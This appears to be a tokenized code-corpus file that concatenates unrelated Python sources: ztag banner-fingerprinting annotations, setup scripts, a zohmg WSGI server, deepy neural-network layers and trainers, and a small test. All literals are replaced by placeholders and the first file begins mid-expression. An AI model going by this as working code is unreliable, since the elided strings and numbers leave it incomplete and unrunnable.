L_eta_phi = ( <EOL> alpha . v ( ) * v . 
v ( ) + <EOL> beta_x . ip ( <NUM_LIT:1> ) * ( v . ip ( <NUM_LIT:1> ) - v . v ( ) ) - <EOL> beta_x . v ( ) * ( v . v ( ) - v . ip ( - <NUM_LIT:1> ) ) + <EOL> beta_y . jp ( <NUM_LIT:1> ) * ( v . jp ( <NUM_LIT:1> ) - v . v ( ) ) - <EOL> beta_y . v ( ) * ( v . v ( ) - v . jp ( - <NUM_LIT:1> ) ) + <EOL> gamma_x . v ( ) * ( v . ip ( <NUM_LIT:1> ) - v . ip ( - <NUM_LIT:1> ) ) + <EOL> gamma_y . v ( ) * ( v . jp ( <NUM_LIT:1> ) - v . jp ( - <NUM_LIT:1> ) ) <EOL> ) <EOL> r . v ( ) [ : , : ] = f . v ( ) - L_eta_phi </s>
<s> __author__ = '<STR_LIT>' <EOL> from setuptools import setup <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' ] , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> install_requires = [ '<STR_LIT>' ] , <EOL> include_package_data = True <EOL> ) </s>
<s> import re <EOL> from ztag . annotation import Annotation <EOL> from ztag . annotation import OperatingSystem <EOL> from ztag . annotation import Type <EOL> from ztag . annotation import Manufacturer <EOL> from ztag import protocols <EOL> import ztag . test <EOL> class FtpBelkin ( Annotation ) : <EOL> protocol = protocols . FTP <EOL> subprotocol = protocols . FTP . BANNER <EOL> port = None <EOL> manufact_re = re . compile ( <EOL> "<STR_LIT>" , <EOL> re . IGNORECASE <EOL> ) <EOL> tests = { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : Type . USB_HUB , <EOL> "<STR_LIT>" : Manufacturer . BELKIN <EOL> } <EOL> } <EOL> } <EOL> def process ( self , obj , meta ) : <EOL> banner = obj [ "<STR_LIT>" ] <EOL> tagged = False <EOL> if self . manufact_re . search ( banner ) : <EOL> meta . global_metadata . device_type = Type . USB_HUB <EOL> meta . global_metadata . manufacturer = Manufacturer . BELKIN <EOL> tagged = True <EOL> if tagged : <EOL> return meta <EOL> else : <EOL> return None </s>
<s> from ztag . annotation import Annotation <EOL> from ztag . annotation import Type <EOL> from ztag . annotation import Manufacturer <EOL> from ztag import protocols <EOL> import ztag . test <EOL> import re <EOL> class FtpLatronix ( Annotation ) : <EOL> name = "<STR_LIT>" <EOL> protocol = protocols . FTP <EOL> subprotocol = protocols . FTP . BANNER <EOL> port = None <EOL> product_re = re . compile ( <EOL> "<STR_LIT>" , <EOL> re . IGNORECASE <EOL> ) <EOL> tests = { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : Type . PRINT_SERVER , <EOL> "<STR_LIT>" : Manufacturer . LANTRONIX , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:version>" : "<STR_LIT>" <EOL> } <EOL> } <EOL> } <EOL> def process ( self , obj , meta ) : <EOL> banner = obj [ "<STR_LIT>" ] <EOL> if self . product_re . search ( banner ) : <EOL> meta . global_metadata . device_type = Type . PRINT_SERVER <EOL> meta . global_metadata . manufacturer = Manufacturer . LANTRONIX <EOL> meta . global_metadata . product = "<STR_LIT>" <EOL> version = self . product_re . search ( banner ) . group ( <NUM_LIT:1> ) <EOL> meta . local_metadata . version = version <EOL> return meta </s>
import re
from ztag.annotation import Annotation
from ztag.annotation import OperatingSystem
from ztag.annotation import Type
from ztag.annotation import Manufacturer
from ztag import protocols
import ztag.test


class FtpTenor(Annotation):
    """Tag FTP banners from Sonus (Tenor) SOHO-router class devices."""

    protocol = protocols.FTP
    subprotocol = protocols.FTP.BANNER
    port = None

    # Fingerprint for the manufacturer string in the banner.
    manufact_re = re.compile(
        "<STR_LIT>",
        re.IGNORECASE
    )
    # Group 1: product token, group 2: version token.
    version_re = re.compile(
        "<STR_LIT>",
        re.IGNORECASE
    )

    tests = {
        "<STR_LIT>": {
            "<STR_LIT>": {
                "<STR_LIT>": Type.SOHO_ROUTER,
                "<STR_LIT>": Manufacturer.SONUS,
                "<STR_LIT>": "<STR_LIT>",
            },
            "<STR_LIT>": {
                "<STR_LIT>": "<STR_LIT>",
                "<STR_LIT:version>": "<STR_LIT>"
            }
        }
    }

    def process(self, obj, meta):
        """Annotate *meta* when the banner matches; otherwise return None.

        Fix: the original called ``.group()`` directly on the result of
        ``version_re.search(banner)``, raising AttributeError whenever the
        manufacturer matched but the version pattern did not. The match is
        now checked before extracting groups.
        """
        banner = obj["<STR_LIT>"]
        if self.manufact_re.search(banner):
            meta.global_metadata.device_type = Type.SOHO_ROUTER
            meta.global_metadata.manufacturer = Manufacturer.SONUS
            meta.global_metadata.product = "<STR_LIT>"
            match = self.version_re.search(banner)
            if match:
                meta.local_metadata.product = match.group(1)
                meta.local_metadata.version = match.group(2)
            return meta


"""<STR_LIT>"""
from ztag.annotation import *


class AVTECHDevice(Annotation):
    """Tag Modbus device-id responses from AVTECH hardware."""

    protocol = protocols.MODBUS
    subprotocol = protocols.MODBUS.DEVICE_ID
    port = None

    def process(self, obj, meta):
        """Annotate *meta* when the vendor string mentions AVTECH.

        Fixes:
        - the original read ``d[...]`` but the parameter is ``obj``, so
          every call raised NameError;
        - ``return meta`` added on the match path for consistency with the
          sibling Modbus annotation (VerisIndustriesAnnotation), which
          returns the annotated meta.
        """
        vendor = obj["<STR_LIT>"]["<STR_LIT>"]["<STR_LIT>"].lower()
        if "<STR_LIT>" in vendor:
            meta.global_metadata.manufacturer = Manufacturer.AVTECH
            meta.tags.add("<STR_LIT>")
            return meta
from ztag.annotation import *
import re


class Helix(Annotation):
    """Tag HTTP ``Server`` headers emitted by the Helix streaming server."""

    protocol = protocols.HTTP
    subprotocol = protocols.HTTP.GET
    port = None

    # Group 1: product version token in the Server header.
    version_re = re.compile(
        "<STR_LIT>",
        re.IGNORECASE
    )
    # Group 1: platform/OS token in the Server header.
    os_re = re.compile(
        "<STR_LIT>",
        re.IGNORECASE
    )

    def process(self, obj, meta):
        """Record product/version and map the platform token to an OS."""
        header = obj["<STR_LIT>"]["<STR_LIT>"]
        if not header.startswith("<STR_LIT>"):
            return
        meta.local_metadata.product = "<STR_LIT>"
        meta.local_metadata.version = self.version_re.search(header).group(1)
        platform = self.os_re.search(header).group(1)
        if "<STR_LIT>" in platform:
            meta.global_metadata.os = OperatingSystem.WINDOWS
        elif "<STR_LIT>" in platform:
            meta.global_metadata.os = OperatingSystem.REDHAT
            meta.global_metadata.os_version = "<STR_LIT:4>"
        elif "<STR_LIT>" in platform:
            meta.global_metadata.os = OperatingSystem.REDHAT
            meta.global_metadata.os_version = "<STR_LIT:5>"
        elif "<STR_LIT>" in platform:
            meta.global_metadata.os = OperatingSystem.REDHAT
            meta.global_metadata.os_version = "<STR_LIT>"
from ztag.annotation import *


class MRV1Server(Annotation):
    """Tag HTTP ``Server`` headers from MRV devices and extract the version."""

    protocol = protocols.HTTP
    subprotocol = protocols.HTTP.GET
    port = None

    def process(self, obj, meta):
        """Annotate *meta* when the Server header matches; else return None."""
        server_header = obj["<STR_LIT>"]["<STR_LIT>"]
        if not server_header.startswith("<STR_LIT>"):
            return None
        meta.local_metadata.product = "<STR_LIT>"
        # Version is the token after the dash, with underscores turned
        # into dots.
        version = server_header.split("<STR_LIT:->")[1].replace("<STR_LIT:_>", "<STR_LIT:.>")
        meta.local_metadata.version = version
        return meta
from ztag.annotation import *


class VerisIndustriesAnnotation(Annotation):
    """Tag Modbus device-id responses from Veris Industries hardware."""

    protocol = protocols.MODBUS
    subprotocol = protocols.MODBUS.DEVICE_ID
    port = None

    def process(self, obj, meta):
        """Set the manufacturer and return *meta* on a vendor match."""
        vendor_name = obj["<STR_LIT>"]["<STR_LIT>"]["<STR_LIT>"].lower()
        if "<STR_LIT>" not in vendor_name:
            return None
        meta.global_metadata.manufacturer = Manufacturer.VERIS
        return meta
<s> from ztag . transform import * <EOL> from ztag import protocols , errors <EOL> class DNP3Transform ( ZGrabTransform ) : <EOL> name = "<STR_LIT>" <EOL> port = <NUM_LIT> <EOL> protocol = protocols . DNP3 <EOL> subprotocol = protocols . DNP3 . STATUS <EOL> def _transform_object ( self , obj ) : <EOL> zout = ZMapTransformOutput ( ) <EOL> wrapped = Transformable ( obj ) <EOL> dnp3 = wrapped [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] <EOL> if not dnp3 [ '<STR_LIT>' ] . resolve ( ) : <EOL> raise errors . IgnoreObject ( ) <EOL> out = { <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : dnp3 [ "<STR_LIT>" ] . resolve ( ) , <EOL> } <EOL> zout . transformed = out <EOL> return zout </s>
from distutils.core import setup

import backbone

# Read the long description inside a context manager so the file handle is
# closed promptly (the original leaked it via an inline open(...).read()).
with open('<STR_LIT>') as readme:
    long_description = readme.read()

setup(
    name='<STR_LIT>',
    packages=['<STR_LIT>', '<STR_LIT>'],
    version=backbone.__version__,
    description=backbone.__doc__,
    long_description=long_description,
    classifiers=[
        '<STR_LIT>',
        '<STR_LIT>',
        '<STR_LIT>',
        '<STR_LIT>',
        '<STR_LIT>',
        '<STR_LIT>',
        '<STR_LIT>',
    ],
    author='<STR_LIT>',
    url='<STR_LIT>',
    license='<STR_LIT>',
)
import os, sys, time
import simplejson as json
from zohmg.config import Config
# Make the sibling data_utils module importable regardless of the CWD.
sys.path.append(os.path.dirname(__file__))
import data_utils


class transform(object):
    """WSGI application (Python 2) that runs a user-supplied transform
    module over data fetched from HBase and returns the result as JSONP.
    """

    def __init__(self):
        # Table name and projection list come from the zohmg config.
        self.config = Config()
        self.table = self.config.dataset()
        self.projections = self.config.projections()

    def __call__(self, environ, start_response):
        project_dir = environ["<STR_LIT>"]
        # Trim the leading and trailing slash before splitting the path.
        url_parts = environ["<STR_LIT>"][1:-1].split("<STR_LIT:/>")
        print "<STR_LIT>" % (time.asctime(), project_dir)
        if len(url_parts) > 1:
            # Multi-component paths are rejected.
            start_response("<STR_LIT>", [("<STR_LIT>", "<STR_LIT>")])
            return "<STR_LIT>" % environ["<STR_LIT>"]
        else:
            # Import the user's transformer from the project directory; the
            # module name is derived from the single path component.
            sys.path.append(project_dir)
            usertransformer = __import__("<STR_LIT>" + url_parts[0])
            transform = usertransformer.transform
            payload = data_utils.hbase_get(self.table, self.projections, environ)
            if payload:
                start_response("<STR_LIT>", [("<STR_LIT>", "<STR_LIT>")])
                return data_utils.dump_jsonp(transform(payload))
            else:
                start_response("<STR_LIT>", [("<STR_LIT>", "<STR_LIT>")])
                return "<STR_LIT>"
import logging as loggers
logging = loggers.getLogger(__name__)
import os
import tempfile
import numpy as np
import urllib
from basic import BasicDataset

# Remote location of each dataset split.
URL_MAP = {
    "<STR_LIT:train>": "<STR_LIT>",
    "<STR_LIT>": "<STR_LIT>",
    "<STR_LIT:test>": "<STR_LIT>"
}
# Local cache path for each split, under the system temp directory.
PATH_MAP = {
    "<STR_LIT:train>": os.path.join(tempfile.gettempdir(), "<STR_LIT>"),
    "<STR_LIT>": os.path.join(tempfile.gettempdir(), "<STR_LIT>"),
    "<STR_LIT:test>": os.path.join(tempfile.gettempdir(), "<STR_LIT>")
}


class BinarizedMnistDataset(BasicDataset):
    """Binarized MNIST dataset that downloads and caches the splits on
    first use (Python 2 code: uses ``urllib.urlretrieve``).
    """

    def __init__(self):
        # Download any split not cached yet and re-save it in NumPy format.
        # NOTE(review): np.save appends ".npy" when the path lacks it while
        # np.load below uses the bare path -- presumably the PATH_MAP
        # entries already end in ".npy"; confirm.
        for name, url in URL_MAP.items():
            local_path = PATH_MAP[name]
            if not os.path.exists(local_path):
                logging.info("<STR_LIT>")
                np.save(local_path, np.loadtxt(urllib.urlretrieve(url)[0]))
        # Each example is a 1-tuple holding one row of the loaded array.
        train_set = [(x,) for x in np.load(PATH_MAP['<STR_LIT:train>'])]
        valid_set = [(x,) for x in np.load(PATH_MAP['<STR_LIT>'])]
        test_set = [(x,) for x in np.load(PATH_MAP['<STR_LIT:test>'])]
        super(BinarizedMnistDataset, self).__init__(train_set, valid=valid_set, test=test_set)
from . import NeuralLayer
from var import NeuralVariable
from deepy.utils import build_activation, FLOATX, XavierGlorotInitializer, OrthogonalInitializer, Scanner, neural_computation
import numpy as np
import theano.tensor as T
from abc import ABCMeta, abstractmethod

# Legal values for the layer's output/input modes (placeholder literals in
# the tokenized source).
OUTPUT_TYPES = ["<STR_LIT>", "<STR_LIT>"]
INPUT_TYPES = ["<STR_LIT>", "<STR_LIT>"]


class RecurrentLayer(NeuralLayer):
    """Abstract base class for recurrent layers driven by a Theano scan.

    Subclasses supply the per-step transition (``compute_new_state``), the
    projection of inputs into step space (``merge_inputs``) and parameter
    creation (``prepare``).
    """
    __metaclass__ = ABCMeta  # Python 2 style ABC declaration

    def __init__(self, name, state_names, hidden_size=100, input_type="<STR_LIT>", output_type="<STR_LIT>",
                 inner_init=None, outer_init=None,
                 gate_activation='<STR_LIT>', activation='<STR_LIT>',
                 steps=None, backward=False, mask=None,
                 additional_input_dims=None):
        """Configure the recurrence.

        :param state_names: names of recurrent states; the first one is the
            "main" state whose sequence/last value is the layer output.
        :param mask: optional sequence mask; a NeuralVariable is unwrapped
            to its underlying tensor.
        """
        super(RecurrentLayer, self).__init__(name)
        self.state_names = state_names
        self.main_state = state_names[0]
        self.hidden_size = hidden_size
        self._gate_activation = gate_activation
        self._activation = activation
        self.gate_activate = build_activation(self._gate_activation)
        self.activate = build_activation(self._activation)
        self._input_type = input_type
        self._output_type = output_type
        # Recurrent weights default to orthogonal init, input projections
        # to Xavier-Glorot.
        self.inner_init = inner_init if inner_init else OrthogonalInitializer()
        self.outer_init = outer_init if outer_init else XavierGlorotInitializer()
        self._steps = steps
        self._mask = mask.tensor if type(mask) == NeuralVariable else mask
        self._go_backwards = backward
        self.additional_input_dims = additional_input_dims if additional_input_dims else []
        if input_type not in INPUT_TYPES:
            raise Exception("<STR_LIT>".format(name, input_type))
        if output_type not in OUTPUT_TYPES:
            raise Exception("<STR_LIT>".format(name, output_type))

    @neural_computation
    def step(self, step_inputs):
        """One scan step: delegate to the subclass, then apply the mask.

        Masked positions keep the previous state (convex blend with the
        0/1 mask broadcast over the feature axis).
        """
        new_states = self.compute_new_state(step_inputs)
        if self._output_type == "<STR_LIT>" and step_inputs.get("<STR_LIT>"):
            mask = step_inputs["<STR_LIT>"].dimshuffle(0, '<STR_LIT:x>')
            for state_name in new_states:
                new_states[state_name] = new_states[state_name] * mask + step_inputs[state_name] * (1 - mask)
        return new_states

    @abstractmethod
    def compute_new_state(self, step_inputs):
        """Return the dict of new state tensors for one step."""

    @abstractmethod
    def merge_inputs(self, input_var, additional_inputs=None):
        """Project raw inputs into the step-input dict consumed by step()."""

    @abstractmethod
    def prepare(self):
        pass

    @neural_computation
    def get_initial_states(self, input_var):
        """Zero-initialize every state as (batch, hidden_size)."""
        initial_states = {}
        for state in self.state_names:
            initial_states[state] = T.alloc(np.cast[FLOATX](0.), input_var.shape[0], self.hidden_size)
        return initial_states

    @neural_computation
    def get_step_inputs(self, input_var, states=None, mask=None, additional_inputs=None):
        """Assemble the sequence/state map fed to the scan step."""
        step_inputs = {}
        if self._input_type == "<STR_LIT>":
            if not additional_inputs:
                additional_inputs = []
            step_inputs.update(self.merge_inputs(input_var, additional_inputs=additional_inputs))
        else:
            # No primary sequence input; only additional inputs are merged.
            if additional_inputs:
                step_inputs.update(self.merge_inputs(None, additional_inputs=additional_inputs))
        if states:
            for name in self.state_names:
                step_inputs[name] = states[name]
        return step_inputs

    def compute(self, input_var, mask=None, additional_inputs=None, steps=None, backward=False):
        # Infer the additional input dimensions lazily from the variables.
        # NOTE(review): Python 2 semantics assumed -- map() must yield a
        # list here, not an iterator.
        if additional_inputs and not self.additional_input_dims:
            self.additional_input_dims = map(lambda var: var.dim(), additional_inputs)
        return super(RecurrentLayer, self).compute(input_var, mask=mask, additional_inputs=additional_inputs, steps=steps, backward=backward)

    def compute_tensor(self, input_var, mask=None, additional_inputs=None, steps=None, backward=False):
        """Run the scan and return either the last state or the full
        state sequence, depending on the configured output type.
        """
        # Call-site arguments override the values fixed at construction.
        backward = backward if backward else self._go_backwards
        steps = steps if steps else self._steps
        mask = mask if mask else self._mask
        if mask and self._input_type == "<STR_LIT>":
            raise Exception("<STR_LIT>")
        init_state_map = self.get_initial_states(input_var)
        if self._input_type == "<STR_LIT>":
            # Batch-major -> time-major for scan.
            input_var = input_var.dimshuffle((1, 0, 2))
            seq_map = self.get_step_inputs(input_var, mask=mask, additional_inputs=additional_inputs)
        else:
            # The input itself seeds the main state.
            init_state_map[self.main_state] = input_var
            seq_map = self.get_step_inputs(None, mask=mask, additional_inputs=additional_inputs)
        retval_map, _ = Scanner(
            self.step,
            sequences=seq_map,
            outputs_info=init_state_map,
            n_steps=steps,
            go_backwards=backward
        ).compute()
        main_states = retval_map[self.main_state]
        if self._output_type == "<STR_LIT>":
            return main_states[-1]
        elif self._output_type == "<STR_LIT>":
            # Time-major -> batch-major, then zero out masked positions.
            main_states = main_states.dimshuffle((1, 0, 2))
            if mask:
                main_states *= mask.dimshuffle((0, 1, '<STR_LIT:x>'))
            return main_states


class RNN(RecurrentLayer):
    """Plain (Elman-style) recurrent layer with a single ``state``."""

    def __init__(self, hidden_size, **kwargs):
        kwargs["<STR_LIT>"] = hidden_size
        super(RNN, self).__init__("<STR_LIT>", ["<STR_LIT:state>"], **kwargs)

    @neural_computation
    def compute_new_state(self, step_inputs):
        xh_t, h_tm1 = map(step_inputs.get, ["<STR_LIT>", "<STR_LIT:state>"])
        # With no sequence input the projected term contributes nothing.
        if not xh_t:
            xh_t = 0
        h_t = self.activate(xh_t + T.dot(h_tm1, self.W_h) + self.b_h)
        return {"<STR_LIT:state>": h_t}

    @neural_computation
    def merge_inputs(self, input_var, additional_inputs=None):
        """Sum the projections of the main and additional inputs."""
        if not additional_inputs:
            additional_inputs = []
        all_inputs = [input_var] + additional_inputs
        h_inputs = []
        for x, weights in zip(all_inputs, self.input_weights):
            wi, = weights
            h_inputs.append(T.dot(x, wi))
        merged_inputs = {
            "<STR_LIT>": sum(h_inputs)
        }
        return merged_inputs

    def prepare(self):
        """Create recurrent and per-input projection parameters."""
        self.output_dim = self.hidden_size
        self.W_h = self.create_weight(self.hidden_size, self.hidden_size, "<STR_LIT:h>", initializer=self.inner_init)
        self.b_h = self.create_bias(self.hidden_size, "<STR_LIT:h>")
        self.register_parameters(self.W_h, self.b_h)
        self.input_weights = []
        if self._input_type == "<STR_LIT>":
            all_input_dims = [self.input_dim] + self.additional_input_dims
            for i, input_dim in enumerate(all_input_dims):
                wi = self.create_weight(input_dim, self.hidden_size, "<STR_LIT>".format(i + 1), initializer=self.outer_init)
                weights = [wi]
                self.input_weights.append(weights)
                self.register_parameters(*weights)
import logging
from deepy.trainers import THEANO_LINKER
from deepy.trainers.base import NeuralTrainer
from deepy.utils import FLOATX
import theano
import numpy as np
import theano.tensor as T
import scipy


class ScipyTrainer(NeuralTrainer):
    """Trainer that drives the network parameters with scipy.optimize.minimize.

    Parameters are flattened into a single vector for scipy and unflattened
    back into per-parameter arrays on each evaluation.

    NOTE(review): the code calls ``scipy.optimize.minimize`` but only
    ``import scipy`` appears here -- presumably ``scipy.optimize`` is
    imported elsewhere before use; confirm.
    """

    # Optimization methods this trainer is meant to support.
    METHODS = ('<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>')

    def __init__(self, network, method, config=None):
        super(ScipyTrainer, self).__init__(network, config)
        self.method = method
        # Max scipy iterations per train_step (default 5).
        self.scipy_updates = config.get("<STR_LIT>", 5) if config else 5
        logging.info('<STR_LIT>')
        # Shapes/sizes/offsets used to pack all parameters into one flat
        # vector and slice it back apart.
        self._shapes = [p.get_value(borrow=True).shape for p in self.network.parameters]
        self._counts = [np.prod(s) for s in self._shapes]
        self._starts = np.cumsum([0] + self._counts)[:-1]
        self._dtype = FLOATX
        self._gradient_func = None  # lazily compiled theano gradient function
        self.learning_func = True

    def train_step(self, train_set, train_size=None):
        """Run one bounded scipy minimization and adopt the result."""
        res = scipy.optimize.minimize(
            fun=self._function_at,
            jac=self._gradient_at,
            x0=self._arrays_to_flat(self.best_params[0]),
            args=(train_set,),
            method=self.method,
            options=dict(maxiter=self.scipy_updates),
        )
        self.set_params(self._flat_to_arrays(res.x))
        return [('<STR_LIT>', res.fun)]

    def _gradient_function(self):
        """Compile (once) and return the theano gradient function."""
        if not self._gradient_func:
            params = self.network.parameters
            inputs = self.network.input_variables + self.network.target_variables
            self._gradient_func = theano.function(inputs, T.grad(self.cost, params),
                                                  allow_input_downcast=True, mode=theano.Mode(linker=THEANO_LINKER))
        return self._gradient_func

    def _function_at(self, x, train_set):
        # Objective for scipy: mean cost over the batches at parameters x.
        # (The loop variable deliberately reuses the name x for each batch.)
        self.set_params(self._flat_to_arrays(x))
        return np.mean([self.evaluation_func(*x)[0] for x in train_set])

    def _gradient_at(self, x, train_set):
        # Jacobian for scipy: per-parameter gradients averaged over batches,
        # flattened to match the parameter vector layout.
        self.set_params(self._flat_to_arrays(x))
        grads = [[] for _ in range(len(self.network.parameters))]
        grad_func = self._gradient_function()
        for x in train_set:
            for i, g in enumerate(grad_func(*x)):
                grads[i].append(np.asarray(g))
        return self._arrays_to_flat([np.mean(g, axis=0) for g in grads])

    def _flat_to_arrays(self, x):
        """Slice the flat vector back into correctly shaped parameter arrays."""
        x = x.astype(self._dtype)
        return [x[o:o + n].reshape(s) for s, o, n in
                zip(self._shapes, self._starts, self._counts)]

    def _arrays_to_flat(self, arrays):
        """Pack parameter arrays into one flat vector in declaration order."""
        x = np.zeros((sum(self._counts),), self._dtype)
        for arr, o, n in zip(arrays, self._starts, self._counts):
            x[o:o + n] = arr.ravel()
        return x
import sys
import numpy as np
from numpy import linalg as LA
from theano import tensor as T
import theano
from deepy.utils.functions import FLOATX
from deepy.trainers import CustomizeTrainer
from deepy.trainers.optimize import optimize_function


class FirstGlimpseTrainer(CustomizeTrainer):
    """Custom trainer (Python 2) that combines plain backprop updates with
    REINFORCE-style updates for an attention layer's W_l / W_f weights.

    Bare <NUM_LIT> tokens below are numeric literals elided by the
    tokenized source.
    """

    def __init__(self, network, attention_layer, config):
        """Compile the combined cost/gradient function and the optimizers.

        Either update path can be switched off via the config flags.
        """
        super(FirstGlimpseTrainer, self).__init__(network, config)
        self.large_cov_mode = False
        self.batch_size = config.get("<STR_LIT>", 20)
        self.disable_backprop = config.get("<STR_LIT>", False)
        self.disable_reinforce = config.get("<STR_LIT>", False)
        # Sentinel value meaning "no average reward computed yet".
        self.last_average_reward = <NUM_LIT>
        self.turn = 1
        self.layer = attention_layer
        if self.disable_backprop:
            grads = []
        else:
            grads = [T.grad(self.cost, p) for p in network.weights + network.biases]
        # When REINFORCE is disabled the raw weights are returned in the
        # gradient slots (they are unused downstream in that mode).
        if self.disable_reinforce:
            grad_l = self.layer.W_l
            grad_f = self.layer.W_f
        else:
            grad_l = self.layer.wl_grad
            grad_f = self.layer.wf_grad
        # Accumulators for one minibatch worth of gradients.
        self.batch_wl_grad = np.zeros(attention_layer.W_l.get_value().shape, dtype=FLOATX)
        self.batch_wf_grad = np.zeros(attention_layer.W_f.get_value().shape, dtype=FLOATX)
        self.batch_grad = [np.zeros(p.get_value().shape, dtype=FLOATX) for p in network.weights + network.biases]
        # Outputs: [cost, grad_l, grad_f, positions, last_decision] + grads.
        self.grad_func = theano.function(network.inputs,
                                         [self.cost, grad_l, grad_f, attention_layer.positions, attention_layer.last_decision] + grads,
                                         allow_input_downcast=True)
        self.opt_func = optimize_function(self.network.weights + self.network.biases, self.config)
        self.rl_opt_func = optimize_function([self.layer.W_l, self.layer.W_f], self.config)

    def update_parameters(self, update_rl):
        """Apply the accumulated minibatch gradients.

        :param update_rl: whether to also apply the REINFORCE update.
        """
        if not self.disable_backprop:
            grads = [self.batch_grad[i] / self.batch_size for i in range(len(self.network.weights + self.network.biases))]
            self.opt_func(*grads)
        if update_rl and not self.disable_reinforce:
            # Skip the RL update when either accumulator is all zero.
            if np.sum(self.batch_wl_grad) == 0 or np.sum(self.batch_wf_grad) == 0:
                sys.stdout.write("<STR_LIT>")
                sys.stdout.flush()
            else:
                grad_wl = self.batch_wl_grad / self.batch_size
                grad_wf = self.batch_wf_grad / self.batch_size
                self.rl_opt_func(grad_wl, grad_wf)

    def train_func(self, train_set):
        """Run one epoch over *train_set*; returns a summary string."""
        cost_sum = 0.0
        batch_cost = 0.0
        counter = 0
        total = 0
        total_reward = 0
        batch_reward = 0
        total_position_value = 0
        pena_count = 0
        for d in train_set:
            pairs = self.grad_func(*d)
            cost = pairs[0]
            # Skip diverged samples entirely.
            if cost > 10 or np.isnan(cost):
                sys.stdout.write("<STR_LIT:X>")
                sys.stdout.flush()
                continue
            batch_cost += cost
            wl_grad = pairs[1]
            wf_grad = pairs[2]
            max_position_value = np.max(np.absolute(pairs[3]))
            total_position_value += max_position_value
            last_decision = pairs[4]
            target_decision = d[1][0]
            # Binary reward for a correct decision; zeroed when the
            # attention position saturates beyond the threshold.
            reward = <NUM_LIT> if last_decision == target_decision else 0
            if max_position_value > <NUM_LIT>:
                reward = 0
            total_reward += reward
            batch_reward += reward
            # Bootstrap the reward baseline once enough samples were seen.
            if self.last_average_reward == <NUM_LIT> and total > <NUM_LIT>:
                self.last_average_reward = total_reward / total
            if not self.disable_reinforce:
                # REINFORCE: scale gradients by the negative advantage.
                self.batch_wl_grad += wl_grad * -(reward - self.last_average_reward)
                self.batch_wf_grad += wf_grad * -(reward - self.last_average_reward)
            if not self.disable_backprop:
                for grad_cache, grad in zip(self.batch_grad, pairs[5:]):
                    grad_cache += grad
            counter += 1
            total += 1
            if counter >= self.batch_size:
                if total == counter: counter -= 1
                self.update_parameters(self.last_average_reward < <NUM_LIT>)
                # Reset the minibatch accumulators.
                if not self.disable_reinforce:
                    self.batch_wl_grad *= 0
                    self.batch_wf_grad *= 0
                if not self.disable_backprop:
                    for grad_cache in self.batch_grad:
                        grad_cache *= 0
                if total % 1000 == 0:
                    sys.stdout.write("<STR_LIT:.>")
                    sys.stdout.flush()
                if not self.disable_reinforce:
                    # Hysteresis (pena_count > 20) before toggling between
                    # the small and large covariance of the attention layer.
                    cov_changed = False
                    if batch_reward / self.batch_size < <NUM_LIT>:
                        if not self.large_cov_mode:
                            if pena_count > 20:
                                self.layer.cov.set_value(self.layer.large_cov)
                                print "<STR_LIT>",
                                cov_changed = True
                            else:
                                pena_count += 1
                        else:
                            pena_count = 0
                    else:
                        if self.large_cov_mode:
                            if pena_count > 20:
                                self.layer.cov.set_value(self.layer.small_cov)
                                print "<STR_LIT>",
                                cov_changed = True
                            else:
                                pena_count += 1
                        else:
                            pena_count = 0
                    if cov_changed:
                        # Keep the cached inverse/determinant in sync.
                        self.large_cov_mode = not self.large_cov_mode
                        self.layer.cov_inv_var.set_value(np.array(LA.inv(self.layer.cov.get_value()), dtype=FLOATX))
                        self.layer.cov_det_var.set_value(LA.det(self.layer.cov.get_value()))
                counter = 0
                cost_sum += batch_cost
                batch_cost = 0.0
                batch_reward = 0
        if total == 0:
            return "<STR_LIT>"
        sys.stdout.write("<STR_LIT:\n>")
        self.last_average_reward = (total_reward / total)
        self.turn += 1
        return "<STR_LIT>" % ((cost_sum / total), self.last_average_reward, (total_position_value / total))
import os
import logging
from argparse import ArgumentParser
from utils import load_data
from lm import NeuralLM
from deepy.trainers import SGDTrainer, LearningRateAnnealer, AdamTrainer
from deepy.layers import LSTM
from layers import FullOutputLayer

logging.basicConfig(level=logging.INFO)

# Default location for the trained model parameters.
default_model = os.path.join(os.path.dirname(__file__), "<STR_LIT>", "<STR_LIT>")

if __name__ == '<STR_LIT:__main__>':
    ap = ArgumentParser()
    ap.add_argument("<STR_LIT>", default="<STR_LIT>")
    ap.add_argument("<STR_LIT>", action="<STR_LIT:store_true>")
    args = ap.parse_args()
    vocab, lmdata = load_data(small=args.small, history_len=5, batch_size=64)
    # LSTM language model with a persistent state carried across batches,
    # reset whenever input token 0 is seen.
    model = NeuralLM(vocab.size)
    model.stack(LSTM(hidden_size=100, output_type="<STR_LIT>",
                     persistent_state=True, batch_size=lmdata.size,
                     reset_state_for_input=0),
                FullOutputLayer(vocab.size))
    # Resume from an existing checkpoint if present.
    if os.path.exists(args.model):
        model.load_params(args.model)
    trainer = SGDTrainer(model, {"<STR_LIT>": LearningRateAnnealer.learning_rate(<NUM_LIT>),
                                 "<STR_LIT>": <NUM_LIT>})
    annealer = LearningRateAnnealer(trainer)
    trainer.run(lmdata, controllers=[annealer])
    # NOTE(review): parameters are loaded from args.model but saved to
    # default_model -- looks asymmetric; confirm this is intended.
    model.save_params(default_model)
from diu.main import Application as RealApplication


class Application(RealApplication):
    """Test double: records the config files it was asked to load
    instead of actually reading them.
    """

    def _load_config(self, *files):
        self.config = {}
        self.given_config_files = files


class TestApplication(object):
    def test_deprecated_file_argument_takes_precedence(self):
        # A positional file argument wins: only that file is consulted.
        app = Application(["<STR_LIT>", "<STR_LIT>"])
        expected = ("<STR_LIT>",)
        assert app.given_config_files == expected

    def test_no_file_arg_uses_etc_docker_image_updater_yml(self):
        # Without arguments the application falls back to the default path.
        app = Application([])
        expected = ("<STR_LIT>",)
        assert app.given_config_files == expected
